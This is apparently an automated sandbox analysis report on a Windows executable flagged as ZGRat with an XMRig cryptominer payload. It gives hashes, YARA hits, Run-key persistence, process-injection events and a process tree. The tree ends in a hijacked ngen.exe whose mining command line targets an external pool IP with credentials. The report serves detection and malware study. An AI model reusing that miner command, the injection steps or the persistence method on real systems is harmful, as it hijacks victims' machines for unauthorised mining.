Analysis
-
max time kernel
146s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-05-2024 02:10
Static task
static1
Behavioral task
behavioral1
Sample
FB23FDE22424F2B381E8325FB71CD2B6.exe
Resource
win7-20240221-en
windows7-x64
11 signatures
150 seconds
General
-
Target
FB23FDE22424F2B381E8325FB71CD2B6.exe
-
Size
2.5MB
-
MD5
fb23fde22424f2b381e8325fb71cd2b6
-
SHA1
6628984dbfaf1e4ffc8a46861cad9809e0f53ebe
-
SHA256
b0e075912e279e893ea6f1aa33a3734679215d740b861ee1f607f1f0406b8094
-
SHA512
51dd1c34e0a58238a5ea69a58814ca88bbc299282ebae25d8e03014a0c5177daeb480115ff9b4112991fbecf64d3ac04af7fc0026d903dd761a7a8b3e4f25ed8
-
SSDEEP
49152:WRqr+/a5i+yQgWd2hvEdS82N26odkmgpAqGE0XjJ7lAXkE6:1+Uzyc2vEdSVJmgaqGE0XVKXk
Malware Config
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral1/memory/3048-3-0x000000001B410000-0x000000001B62E000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-5-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-4-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-7-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-9-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-11-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-13-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-15-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-17-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-19-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-35-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-37-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-39-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-41-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-43-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-45-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-49-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-51-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-53-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-57-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-55-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-61-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-63-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-23-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-21-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-67-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-66-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-59-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-47-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-33-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-31-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-29-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-27-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 behavioral1/memory/3048-25-0x000000001B410000-0x000000001B628000-memory.dmp family_zgrat_v1 -
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/memory/2204-4939-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
resource yara_rule behavioral1/memory/2204-4932-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2204-4939-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\jotler = "C:\\Users\\Admin\\AppData\\Roaming\\jotler.exe" FB23FDE22424F2B381E8325FB71CD2B6.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3048 set thread context of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 1932 set thread context of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe Token: SeDebugPrivilege 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe Token: SeDebugPrivilege 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe Token: SeLockMemoryPrivilege 2204 ngen.exe Token: SeLockMemoryPrivilege 2204 ngen.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2204 ngen.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 3048 wrote to memory of 1932 3048 FB23FDE22424F2B381E8325FB71CD2B6.exe 28 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30 PID 1932 wrote to memory of 2204 1932 FB23FDE22424F2B381E8325FB71CD2B6.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe"C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe"1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe"C:\Users\Admin\AppData\Local\Temp\FB23FDE22424F2B381E8325FB71CD2B6.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2204
-
-